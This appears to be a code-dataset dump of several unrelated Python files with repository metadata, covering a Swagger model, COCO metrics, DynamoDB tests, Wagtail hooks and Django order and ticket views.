"""
if owner_faction_id is None:
raise ValueError("Invalid value for `owner_faction_id`, must not be `None`") # noqa: E501
self._owner_faction_id = owner_faction_id
@property
def occupier_faction_id(self):
"""Gets the occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
occupier_faction_id integer # noqa: E501
:return: The occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._occupier_faction_id
@occupier_faction_id.setter
def occupier_faction_id(self, occupier_faction_id):
"""Sets the occupier_faction_id of this GetFwSystems200Ok.
occupier_faction_id integer # noqa: E501
:param occupier_faction_id: The occupier_faction_id of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if occupier_faction_id is None:
raise ValueError("Invalid value for `occupier_faction_id`, must not be `None`") # noqa: E501
self._occupier_faction_id = occupier_faction_id
@property
def victory_points(self):
"""Gets the victory_points of this GetFwSystems200Ok. # noqa: E501
victory_points integer # noqa: E501
:return: The victory_points of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._victory_points
@victory_points.setter
def victory_points(self, victory_points):
"""Sets the victory_points of this GetFwSystems200Ok.
victory_points integer # noqa: E501
:param victory_points: The victory_points of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if victory_points is None:
raise ValueError("Invalid value for `victory_points`, must not be `None`") # noqa: E501
self._victory_points = victory_points
@property
def victory_points_threshold(self):
"""Gets the victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
victory_points_threshold integer # noqa: E501
:return: The victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
:rtype: int
"""
return self._victory_points_threshold
@victory_points_threshold.setter
def victory_points_threshold(self, victory_points_threshold):
"""Sets the victory_points_threshold of this GetFwSystems200Ok.
victory_points_threshold integer # noqa: E501
:param victory_points_threshold: The victory_points_threshold of this GetFwSystems200Ok. # noqa: E501
:type: int
"""
if victory_points_threshold is None:
raise ValueError("Invalid value for `victory_points_threshold`, must not be `None`") # noqa: E501
self._victory_points_threshold = victory_points_threshold
@property
def contested(self):
"""Gets the contested of this GetFwSystems200Ok. # noqa: E501
contested boolean # noqa: E501
:return: The contested of this GetFwSystems200Ok. # noqa: E501
:rtype: bool
"""
return self._contested
@contested.setter
def contested(self, contested):
"""Sets the contested of this GetFwSystems200Ok.
contested boolean # noqa: E501
:param contested: The contested of this GetFwSystems200Ok. # noqa: E501
:type: bool
"""
if contested is None:
raise ValueError("Invalid value for `contested`, must not be `None`") # noqa: E501
self._contested = contested
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, GetFwSystems200Ok):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 0 | 0 | 0 |
dfea545de52865e245de45e9353a7cf90987e97d | 288 | py | Python | PF/Inicio.py | HectorR28/uip-iiiq-pc3 | 7fd3f0f8191a7442f4330ff54d72eb6e157a740e | [
"MIT"
] | null | null | null | PF/Inicio.py | HectorR28/uip-iiiq-pc3 | 7fd3f0f8191a7442f4330ff54d72eb6e157a740e | [
"MIT"
] | null | null | null | PF/Inicio.py | HectorR28/uip-iiiq-pc3 | 7fd3f0f8191a7442f4330ff54d72eb6e157a740e | [
"MIT"
] | null | null | null | import FormaPago
import MenuOpciones
if __name__ == '__main__':
FormaPago.menuPagos()
opc = input("Dijite el numero de la opción que desea acceder: ")
if opc == "1":
MenuOpciones.OpcionCrear()
elif opc == "2":
MenuOpciones.OpcionCambiar()
| 24 | 69 | 0.618056 | import FormaPago
import MenuOpciones
if __name__ == '__main__':
FormaPago.menuPagos()
opc = input("Dijite el numero de la opción que desea acceder: ")
if opc == "1":
MenuOpciones.OpcionCrear()
elif opc == "2":
MenuOpciones.OpcionCambiar()
| 0 | 0 | 0 |
b7d0df4e655dd699076dac3a6a0a158b736eb180 | 2,196 | py | Python | I-Random-Forest/Algorithm_test_harness.py | raja21068/Research-on-data-mining-of-permission-induced-risk-for-android-IoT-devices | 522d3a0d0fde7dd2f51565e57e1bf30d8c7d9712 | [
"Apache-2.0"
] | 1 | 2021-04-02T05:48:46.000Z | 2021-04-02T05:48:46.000Z | I-Random-Forest/Algorithm_test_harness.py | raja21068/Research-on-data-mining-of-permission-induced-risk-for-android-IoT-devices | 522d3a0d0fde7dd2f51565e57e1bf30d8c7d9712 | [
"Apache-2.0"
] | null | null | null | I-Random-Forest/Algorithm_test_harness.py | raja21068/Research-on-data-mining-of-permission-induced-risk-for-android-IoT-devices | 522d3a0d0fde7dd2f51565e57e1bf30d8c7d9712 | [
"Apache-2.0"
] | null | null | null | from random import randrange
# Split a dataset into a train and test set
# Split a dataset into $k$ folds
# Evaluate an algorithm using a train/test split several times
# Evaluate an algorithm using a cross-validation split
| 37.220339 | 100 | 0.640255 | from random import randrange
# Split a dataset into a train and test set
def train_test_split(dataset, split):
train = list()
train_size = split * len(dataset)
dataset_copy = list(dataset)
while len(train) < train_size:
index = randrange(len(dataset_copy))
train.append(dataset_copy.pop(index))
return train, dataset_copy
# Split a dataset into $k$ folds
def cross_validation_split(dataset, n_folds):
dataset_split = list()
dataset_copy = list(dataset)
fold_size = int(len(dataset) / n_folds)
for _ in range(n_folds):
fold = list()
while len(fold) < fold_size:
index = randrange(len(dataset_copy))
fold.append(dataset_copy.pop(index))
dataset_split.append(fold)
return dataset_split
# Evaluate an algorithm using a train/test split several times
def evaluate_algorithm_tt_split(dataset, algorithm, split, n_splits, performance_assessment,*args):
scores = list()
for _ in range(n_splits):
train, test = train_test_split(dataset, split)
test_set = list()
for row in test:
row_copy = list(row)
row_copy[-1] = None
test_set.append(row_copy)
predicted = algorithm(train, test_set, *args)
actual = [row[-1] for row in test]
performance = performance_assessment(actual, predicted)
scores.append(performance)
return scores
# Evaluate an algorithm using a cross-validation split
def evaluate_algorithm_cv(dataset, algorithm, n_folds, performance_assessment, *args):
folds = cross_validation_split(dataset, n_folds)
scores = list()
for fold in folds:
train_set = list(folds)
train_set.remove(fold)
train_set = sum(train_set, [])
test_set = list()
for row in fold:
row_copy = list(row)
test_set.append(row_copy)
row_copy[-1] = None
predicted = algorithm(train_set, test_set, *args)
actual = [row[-1] for row in fold]
performance = performance_assessment(actual, predicted)
scores.append(performance)
return scores | 1,869 | 0 | 91 |
f716476a8f9925dfffc1e7bbbe2678c6a6fa7d50 | 11,978 | py | Python | tools/accuracy_checker/accuracy_checker/metrics/coco_orig_metrics.py | apankratovantonp/open_model_zoo | e372d4173e50741a6828cda415d55c37320f89cd | [
"Apache-2.0"
] | 5 | 2020-03-09T07:39:04.000Z | 2021-08-16T07:17:28.000Z | tools/accuracy_checker/accuracy_checker/metrics/coco_orig_metrics.py | ananda89/open_model_zoo | e372d4173e50741a6828cda415d55c37320f89cd | [
"Apache-2.0"
] | 6 | 2020-09-26T01:24:39.000Z | 2022-02-10T02:16:03.000Z | tools/accuracy_checker/accuracy_checker/metrics/coco_orig_metrics.py | ananda89/open_model_zoo | e372d4173e50741a6828cda415d55c37320f89cd | [
"Apache-2.0"
] | 3 | 2020-07-06T08:45:26.000Z | 2020-11-12T10:14:45.000Z | """
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tempfile
import json
from ..representation import (
DetectionPrediction,
DetectionAnnotation,
CoCoInstanceSegmentationAnnotation,
CoCocInstanceSegmentationPrediction,
PoseEstimationAnnotation,
PoseEstimationPrediction
)
from ..logging import print_info
from ..config import BaseField
from ..utils import get_or_parse_value
from .metric import FullDatasetEvaluationMetric
from .coco_metrics import COCO_THRESHOLDS
SHOULD_SHOW_PREDICTIONS = False
SHOULD_DISPLAY_DEBUG_IMAGES = False
if SHOULD_DISPLAY_DEBUG_IMAGES:
import cv2
iou_specific_processing = {
'bbox': box_to_coco,
'segm': segm_to_coco,
'keypoints': keypoints_to_coco
}
| 38.514469 | 120 | 0.671648 | """
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import tempfile
import json
from ..representation import (
DetectionPrediction,
DetectionAnnotation,
CoCoInstanceSegmentationAnnotation,
CoCocInstanceSegmentationPrediction,
PoseEstimationAnnotation,
PoseEstimationPrediction
)
from ..logging import print_info
from ..config import BaseField
from ..utils import get_or_parse_value
from .metric import FullDatasetEvaluationMetric
from .coco_metrics import COCO_THRESHOLDS
SHOULD_SHOW_PREDICTIONS = False
SHOULD_DISPLAY_DEBUG_IMAGES = False
if SHOULD_DISPLAY_DEBUG_IMAGES:
import cv2
def box_to_coco(prediction_data_to_store, pred):
x_mins = pred.x_mins.tolist()
y_mins = pred.y_mins.tolist()
x_maxs = pred.x_maxs.tolist()
y_maxs = pred.y_maxs.tolist()
for data_record, x_min, y_min, x_max, y_max in zip(
prediction_data_to_store, x_mins, y_mins, x_maxs, y_maxs
):
width = x_max - x_min + 1
height = y_max - y_min + 1
data_record.update({'bbox': [x_min, y_min, width, height]})
return prediction_data_to_store
def segm_to_coco(prediction_data_to_store, pred):
encoded_masks = pred.mask
for data_record, segm_mask in zip(prediction_data_to_store, encoded_masks):
data_record.update({'segmentation': segm_mask})
return prediction_data_to_store
def keypoints_to_coco(prediction_data_to_store, pred):
for data_record, x_val, y_val, vis in zip(
prediction_data_to_store, pred.x_values, pred.y_values, pred.visibility
):
keypoints = []
for x, y, v in zip(x_val, y_val, vis):
keypoints.extend([x, y, int(v)])
data_record.update({
'keypoints': keypoints
})
return prediction_data_to_store
iou_specific_processing = {
'bbox': box_to_coco,
'segm': segm_to_coco,
'keypoints': keypoints_to_coco
}
class MSCOCOorigBaseMetric(FullDatasetEvaluationMetric):
annotation_types = (DetectionAnnotation, )
prediction_types = (DetectionPrediction, )
iou_type = 'bbox'
@classmethod
def parameters(cls):
parameters = super().parameters()
parameters.update({
'threshold': BaseField(optional=True, default='.50:.05:.95', description='threshold for metric calculation')
})
return parameters
def configure(self):
self.threshold = get_or_parse_value(self.get_value_from_config('threshold'), COCO_THRESHOLDS)
@staticmethod
def generate_map_pred_label_id_to_coco_cat_id(has_background, use_full_label_map):
shift = 0 if has_background else 1
max_cat = 90 if use_full_label_map else 80
max_key = max_cat - shift
res_map = {i: i + shift for i in range(0, max_key+1)}
assert max(res_map.values()) == max_cat
return res_map
def _prepare_coco_structures(self):
from pycocotools.coco import COCO
annotation_conversion_parameters = self.dataset.config.get('annotation_conversion')
if not annotation_conversion_parameters:
raise ValueError('annotation_conversion parameter is not pointed, '
'but it is required for coco original metrics')
annotation_file = annotation_conversion_parameters.get('annotation_file')
if not annotation_file.is_file():
raise ValueError("annotation file '{}' is not found".format(annotation_file))
has_background = annotation_conversion_parameters.get('has_background', False)
use_full_label_map = annotation_conversion_parameters.get('use_full_label_map', False)
meta = self.dataset.metadata
coco = COCO(str(annotation_file))
assert 0 not in coco.cats.keys()
coco_cat_name_to_id = {v['name']: k for k, v in coco.cats.items()}
if has_background:
assert 'background_label' in meta
bg_lbl = meta['background_label']
bg_name = meta['label_map'][bg_lbl]
assert bg_name not in coco_cat_name_to_id
coco_cat_name_to_id[bg_name] = bg_lbl
else:
assert 'background_label' not in meta
if not use_full_label_map:
map_pred_label_id_to_coco_cat_id = {k: coco_cat_name_to_id[v] for k, v in meta['label_map'].items()}
else:
map_pred_label_id_to_coco_cat_id = self.generate_map_pred_label_id_to_coco_cat_id(has_background,
use_full_label_map)
for k, v in meta['label_map'].items():
assert map_pred_label_id_to_coco_cat_id[k] == coco_cat_name_to_id[v], (
"k = {}, v = {}, map_pred_label_id_to_coco_cat_id[k] = {}, coco_cat_name_to_id[v] = {}".format(
k, v, map_pred_label_id_to_coco_cat_id[k], coco_cat_name_to_id[v]))
assert all(map_pred_label_id_to_coco_cat_id[k] == coco_cat_name_to_id[v]
for k, v in meta['label_map'].items())
map_coco_img_file_name_to_img_id = {os.path.basename(v['file_name']): v['id'] for v in coco.dataset['images']}
assert len(map_coco_img_file_name_to_img_id) == len(coco.dataset['images']), "Image name duplications"
return coco, map_coco_img_file_name_to_img_id, map_pred_label_id_to_coco_cat_id
@staticmethod
def _convert_data_to_coco_format(
predictions, map_coco_img_file_name_to_img_id, map_pred_label_id_to_coco_cat_id, iou_type='bbox'
):
coco_data_to_store = []
for pred in predictions:
prediction_data_to_store = []
cur_name = pred.identifier
cur_name = os.path.basename(cur_name)
assert cur_name in map_coco_img_file_name_to_img_id
cur_img_id = map_coco_img_file_name_to_img_id[cur_name]
labels = pred.labels.tolist()
scores = pred.scores.tolist()
cur_num = len(labels)
assert len(scores) == cur_num
coco_cats = [map_pred_label_id_to_coco_cat_id[lbl] for lbl in labels]
for (s, cur_cat) in zip(scores, coco_cats):
prediction_data_to_store.append({
'image_id': cur_img_id,
'score': s,
'category_id': cur_cat,
'_image_name_from_dataset': cur_name,
})
iou_specific_converter = iou_specific_processing.get(iou_type)
if iou_specific_converter is None:
raise ValueError("unknown iou type: '{}'".format(iou_type))
prediction_data_to_store = iou_specific_converter(prediction_data_to_store, pred)
coco_data_to_store.extend(prediction_data_to_store)
return coco_data_to_store
@staticmethod
def _reload_results_to_coco_class(coco, coco_data_to_store):
with tempfile.NamedTemporaryFile() as ftmp:
json_file_to_store = ftmp.name + ".json"
with open(json_file_to_store, 'w') as f:
json.dump(coco_data_to_store, f, indent=4)
json_file_to_load = json_file_to_store
coco_res = coco.loadRes(json_file_to_load)
return coco_res
@staticmethod
def _debug_printing_and_displaying_predictions(coco, coco_res, data_source, should_display_debug_images):
for coco_data_el in coco_res.dataset['annotations']:
cur_name_from_dataset = coco_data_el.get('_image_name_from_dataset', None)
x1, y1, w, h = coco_data_el['bbox']
x2 = x1+w
y2 = y1+h
x1 = int(x1)
y1 = int(y1)
x2 = int(x2)
y2 = int(y2)
category_id = coco_data_el['category_id']
category_name = coco.cats[category_id]['name']
coco_image_id = coco_data_el['image_id']
cur_name = coco.imgs[coco_image_id]['file_name']
assert cur_name == cur_name_from_dataset or cur_name_from_dataset is None
s = coco_data_el['score']
print_info("cur_name =" + cur_name)
print_info(" {} {} {} {} {} % {}".format(
x1, y1, x2, y2, int(100*s), category_name))
if should_display_debug_images:
img_path = os.path.join(str(data_source), str(cur_name))
img = cv2.imread(img_path)
cv2.rectangle(img, (int(x1), int(y1)), (int(x2), int(y2)), (0, 255, 0), 2)
cv2.imshow("img", img)
key = 0
while key not in (32, 27):
key = cv2.waitKey() & 0xff
should_display_debug_images = (key != 27)
@staticmethod
def _run_coco_evaluation(coco, coco_res, iou_type='bbox', threshold=None):
from pycocotools.cocoeval import COCOeval
cocoeval = COCOeval(coco, coco_res, iouType=iou_type)
if threshold is not None:
cocoeval.params.iouThrs = threshold
cocoeval.evaluate()
cocoeval.accumulate()
cocoeval.summarize()
res = cocoeval.stats.tolist()
res_len = len(res)
middle_index = res_len //2
assert res_len == 12 if iou_type != 'keypoints' else 10
res = [res[:middle_index], res[middle_index:]]
return res
def compute_precision_recall(self, predictions):
coco, map_coco_img_file_name_to_img_id, map_pred_label_id_to_coco_cat_id = self._prepare_coco_structures()
coco_data_to_store = self._convert_data_to_coco_format(
predictions, map_coco_img_file_name_to_img_id, map_pred_label_id_to_coco_cat_id, self.iou_type
)
coco_res = self._reload_results_to_coco_class(coco, coco_data_to_store)
if SHOULD_SHOW_PREDICTIONS:
data_source = self.dataset.config.get('data_source')
should_display_debug_images = SHOULD_DISPLAY_DEBUG_IMAGES
self._debug_printing_and_displaying_predictions(coco, coco_res, data_source, should_display_debug_images)
res = self._run_coco_evaluation(coco, coco_res, self.iou_type, self.threshold)
print_info("MSCOCOorigBaseMetric.compute_precision_recall: returning " + str(res))
return res
def evaluate(self, annotations, predictions):
pass
class MSCOCOorigAveragePrecision(MSCOCOorigBaseMetric):
__provider__ = 'coco_orig_precision'
def evaluate(self, annotations, predictions):
return self.compute_precision_recall(predictions)[0][0]
class MSCOCOOrigSegmAveragePrecision(MSCOCOorigAveragePrecision):
__provider__ = 'coco_orig_segm_precision'
annotation_types = (CoCoInstanceSegmentationAnnotation, )
prediction_types = (CoCocInstanceSegmentationPrediction, )
iou_type = 'segm'
class MSCOCOorigRecall(MSCOCOorigBaseMetric):
__provider__ = 'coco_orig_recall'
def evaluate(self, annotations, predictions):
return self.compute_precision_recall(predictions)[1][2]
class MSCOCOorigSegmRecall(MSCOCOorigRecall):
__provider__ = 'coco_orig_segm_recall'
annotation_types = (CoCoInstanceSegmentationAnnotation, )
prediction_types = (CoCocInstanceSegmentationPrediction, )
iou_type = 'segm'
class MSCOCOOrigKeyPointsAveragePrecision(MSCOCOorigAveragePrecision):
__provider__ = 'coco_orig_keypoints_precision'
annotation_types = (PoseEstimationAnnotation, )
prediction_types = (PoseEstimationPrediction, )
iou_type = 'keypoints'
| 9,098 | 1,405 | 207 |
13abde44b52e1b7752f7e4c67c276e8bdf6b48d1 | 1,530 | py | Python | wagtail_turbo/wagtail_hooks.py | kaedroho/wagtail-turbo | 5e0507a0bc452a37ab759b107e0d9a14bdfc194b | [
"BSD-3-Clause"
] | 4 | 2022-02-06T04:01:13.000Z | 2022-02-25T23:12:02.000Z | wagtail_turbo/wagtail_hooks.py | kaedroho/wagtail-turbo | 5e0507a0bc452a37ab759b107e0d9a14bdfc194b | [
"BSD-3-Clause"
] | null | null | null | wagtail_turbo/wagtail_hooks.py | kaedroho/wagtail-turbo | 5e0507a0bc452a37ab759b107e0d9a14bdfc194b | [
"BSD-3-Clause"
] | null | null | null | from django.urls import path, include, reverse
from django.views.decorators.clickjacking import xframe_options_sameorigin
from django.views.generic.base import TemplateView
from django.views.i18n import JavaScriptCatalog
from wagtail.core import hooks
from .decorators import turbo_disable
from .views import turbo_init
@hooks.register("register_admin_urls")
@hooks.register("insert_global_admin_js", order=100)
| 34 | 142 | 0.675817 | from django.urls import path, include, reverse
from django.views.decorators.clickjacking import xframe_options_sameorigin
from django.views.generic.base import TemplateView
from django.views.i18n import JavaScriptCatalog
from wagtail.core import hooks
from .decorators import turbo_disable
from .views import turbo_init
@hooks.register("register_admin_urls")
def register_admin_urls():
urls = [
path('jsi18n/', JavaScriptCatalog.as_view(packages=['wagtail_turbo']), name='javascript_catalog'),
path('frame/', xframe_options_sameorigin(turbo_disable(TemplateView.as_view(template_name='wagtailturbo/frame.html'))), name='frame'),
path('init/', turbo_init, name='init'),
]
return [
path(
"turbo/",
include(
(urls, "wagtail_turbo"),
namespace="wagtail_turbo",
),
)
]
@hooks.register("insert_global_admin_js", order=100)
def global_admin_js():
# Inject some JavaScript to initialise Wagtail Turbo if it's not initialised.
# We could add some logic in to the decorator to convert all non-turbo responses into turbo ones by default
# However, this causes issues as it's hard to tell if a request was made with fetch() and we do no want to convert these
return """
<script>
if (!window.TURBO_ENABLED) {
window.location.href = '%s?path=' + encodeURIComponent(window.location.pathname);
}
</script>
""" % (
reverse('wagtail_turbo:init'),
)
| 1,068 | 0 | 44 |
608cb71dada00e358af1fedbf6b2381088d791af | 8,201 | py | Python | tests/unit/test_dynamodb.py | radsec/ottr | 411559a2bac307594c92d4d14667143cd04625ff | [
"Apache-2.0"
] | 207 | 2021-10-29T20:35:04.000Z | 2022-03-02T08:04:06.000Z | tests/unit/test_dynamodb.py | wngn123/ottr | 411559a2bac307594c92d4d14667143cd04625ff | [
"Apache-2.0"
] | 3 | 2021-11-05T05:50:57.000Z | 2022-01-03T06:07:18.000Z | tests/unit/test_dynamodb.py | wngn123/ottr | 411559a2bac307594c92d4d14667143cd04625ff | [
"Apache-2.0"
] | 19 | 2021-11-03T06:34:46.000Z | 2022-03-21T14:06:54.000Z | import pytest
import boto3
from moto.dynamodb2 import mock_dynamodb2
from otter.router.src.shared.client import DynamoDBClient, get_valid_devices
from otter.router.src.shared.device import Device
DYNAMODB_TABLE = "ottr-example"
@pytest.fixture
@mock_dynamodb2
@mock_dynamodb2
@mock_dynamodb2
@mock_dynamodb2
@mock_dynamodb2
@mock_dynamodb2
@mock_dynamodb2
| 33.068548 | 79 | 0.54786 | import pytest
import boto3
from moto.dynamodb2 import mock_dynamodb2
from otter.router.src.shared.client import DynamoDBClient, get_valid_devices
from otter.router.src.shared.device import Device
DYNAMODB_TABLE = "ottr-example"
@pytest.fixture
def _init_database():
@mock_dynamodb2
def dynamodb_client():
dynamodb = boto3.resource('dynamodb', region_name='us-east-1')
# Create Mock DynamoDB Database
dynamodb.create_table(
TableName=DYNAMODB_TABLE,
KeySchema=[
{"AttributeName": "system_name", "KeyType": "HASH"}
],
AttributeDefinitions=[
{"AttributeName": "system_name", "AttributeType": "S"},
{"AttributeName": "ip_address", "AttributeType": "S"},
{"AttributeName": "data_center", "AttributeType": "S"},
{"AttributeName": "host_platform", "AttributeType": "S"},
{"AttributeName": "origin", "AttributeType": "S"}
],
GlobalSecondaryIndexes=[
{
'IndexName': 'system_name_index',
'KeySchema': [
{
'AttributeName': 'system_name',
'KeyType': 'HASH'
},
],
'Projection': {
'ProjectionType': 'ALL',
},
},
{
'IndexName': 'host_platform_index',
'KeySchema': [
{
'AttributeName': 'host_platform',
'KeyType': 'HASH'
},
],
'Projection': {
'ProjectionType': 'ALL',
},
},
{
'IndexName': 'ip_address_index',
'KeySchema': [
{
'AttributeName': 'ip_address',
'KeyType': 'HASH'
},
],
'Projection': {
'ProjectionType': 'ALL',
},
},
{
'IndexName': 'data_center_index',
'KeySchema': [
{
'AttributeName': 'data_center',
'KeyType': 'HASH'
},
],
'Projection': {
'ProjectionType': 'ALL',
},
},
{
'IndexName': 'origin_index',
'KeySchema': [
{
'AttributeName': 'origin',
'KeyType': 'HASH'
},
],
'Projection': {
'ProjectionType': 'ALL',
},
},
]
)
# Populate Mock Database with Asset
client = DynamoDBClient(region_name='us-east-1',
table_name=DYNAMODB_TABLE)
device = Device(
system_name='test.example.com',
common_name='test.example.com',
ip_address='10.0.0.1',
certificate_authority='digicert',
data_center='example',
host_platform='panos',
os_version='1.0.0',
device_model='PA-XXXX',
origin='API',
subject_alternative_name=['example.com']
)
client.create_item(device)
return dynamodb
return dynamodb_client
@mock_dynamodb2
def test_dynamodb_update_item(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
device = Device(
system_name='test.example.com',
common_name='test.example.com',
ip_address='10.0.0.1',
certificate_authority='lets_encrypt',
data_center='CHANGED',
host_platform='panos',
os_version='1.0.0',
device_model='PA-XXXX',
origin='API',
subject_alternative_name=['example.com']
)
client.update_item(device)
output = client._get_query('test.example.com')
assert output['Items'][0].get('data_center') == 'CHANGED'
@mock_dynamodb2
def test_dynamodb_scan_table(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
output = client.scan_table()
assert output.get('Count') == 1
@mock_dynamodb2
def test_dynamodb_put_multiple_items(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
device = Device(
system_name='second.example.com',
common_name='second.example.com',
ip_address='10.0.0.1',
certificate_authority='lets_encrypt',
data_center='example',
host_platform='panos',
os_version='1.0.0',
device_model='PA-XXXX',
origin='API',
subject_alternative_name=['example.com']
)
client.create_item(device)
output = client.scan_table()
assert output.get('Count') == 2
@mock_dynamodb2
def test_dynamodb_query_items_valid(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
device = Device(
system_name='test.example.com',
common_name='test.example.com',
ip_address='10.0.0.1',
certificate_authority='lets_encrypt',
data_center='example',
host_platform='panos',
os_version='1.0.0',
device_model='PA-XXXX',
origin='API',
subject_alternative_name=['example.com']
)
client.create_item(device)
output = client._get_query('test.example.com')
assert output['Items'][0].get('system_name') == 'test.example.com'
@mock_dynamodb2
def test_dynamodb_maintain_ca(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
device = Device(
system_name='test.example.com',
common_name='test.example.com',
ip_address='10.0.0.1',
certificate_authority='lets_encrypt',
data_center='example',
host_platform='panos',
os_version='1.0.0',
device_model='PA-XXXX',
origin='API',
subject_alternative_name=['example.com']
)
output = client.update_item(device)
assert output['Attributes'].get('certificate_authority') == 'digicert'
@mock_dynamodb2
def test_dynamodb_delete_item(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
client.delete_item('test.example.com')
output = client.scan_table()
assert output.get('Count') == 0
@mock_dynamodb2
def test_dynamodb_expiration_lookup(_init_database, monkeypatch):
monkeypatch.setenv('aws_region', 'us-east-1')
monkeypatch.setenv('dynamodb_table', 'ottr-example')
_init_database()
client = DynamoDBClient(region_name='us-east-1', table_name=DYNAMODB_TABLE)
assets = client.scan_table()
output = get_valid_devices(assets, ['test.example.com'])
assert output[0]['system_name'] == 'test.example.com'
| 7,651 | 0 | 176 |
0774aee7584655c587314499e7abb1c664124d64 | 4,152 | py | Python | mysite/core/views.py | root121976/ticket | c16932daa497bd22adf0f0625d8e724201386e6e | [
"MIT"
] | null | null | null | mysite/core/views.py | root121976/ticket | c16932daa497bd22adf0f0625d8e724201386e6e | [
"MIT"
] | 3 | 2020-02-12T00:42:25.000Z | 2021-06-10T21:37:06.000Z | mysite/core/views.py | root121976/ticket | c16932daa497bd22adf0f0625d8e724201386e6e | [
"MIT"
] | null | null | null | from django.shortcuts import render, redirect, render_to_response
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.views.generic import TemplateView, ListView, CreateView
from django.core.files.storage import FileSystemStorage
from django.urls import reverse_lazy
from .forms import BookForm
from .forms import OrderForm
from .forms import TripInOrderForm
from .models import Book
from .models import Order
from .models import TripInOrder
from mysite.choices import *
# class Home(TemplateView):
# count = User.objects.count()
# template_name = 'home.html'
# return render(request, 'home.html', {
# 'count': count
# })
@login_required
@login_required
| 24.862275 | 84 | 0.651734 | from django.shortcuts import render, redirect, render_to_response
from django.contrib.auth.models import User
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.views.generic import TemplateView, ListView, CreateView
from django.core.files.storage import FileSystemStorage
from django.urls import reverse_lazy
from .forms import BookForm
from .forms import OrderForm
from .forms import TripInOrderForm
from .models import Book
from .models import Order
from .models import TripInOrder
from mysite.choices import *
# class Home(TemplateView):
# count = User.objects.count()
# template_name = 'home.html'
# return render(request, 'home.html', {
# 'count': count
# })
def upload(request):
context = {}
if request.method == 'POST':
uploaded_file = request.FILES['document']
fs = FileSystemStorage()
name = fs.save(uploaded_file.name, uploaded_file)
context['url'] = fs.url(name)
return render(request, 'upload.html', context)
@login_required
def book_list(request):
orders = Order.objects.all()
return render(request, 'book_list.html', {
'orders': orders
})
def upload_book(request):
if request.method == 'POST':
form = OrderForm(request.POST, request.FILES,initial={'user': request.user})
if form.is_valid():
form.save()
return redirect('book_list')
else:
form = OrderForm(initial={'user': request.user})
return render(request, 'upload_book.html', {
'form': form
})
def order_detailview(request,pk):
order = Order.objects.get(pk=pk)
if request.method == 'POST':
form = OrderForm(request.POST, instance=order)
if form.is_valid():
form.save()
return redirect('book_list')
else:
form = OrderForm(instance=order)
return render(request, 'order_detail.html', {
'form': form
})
def ticket_detailview(request,pk):
ticket = TripInOrder.objects.get(pk=pk)
if request.method == 'POST':
form = TripInOrderForm(request.POST, request.FILES, instance=ticket)
if form.is_valid():
form.save()
return redirect('book_list')
else:
form = TripInOrderForm(instance=ticket)
return render(request, 'ticket_detail.html', {
'form': form
})
def delete_book(request, pk):
if request.method == 'POST':
book = Order.objects.get(pk=pk)
book.delete()
return redirect('book_list')
def delete_trip(request, pk):
if request.method == 'POST':
book = TripInOrder.objects.get(pk=pk)
book.delete()
return redirect('book_list')
def create_trips(request, pk):
order = Order.objects.get(pk=pk)
if request.method == 'POST':
form = TripInOrderForm(request.POST or None, initial={'order': order})
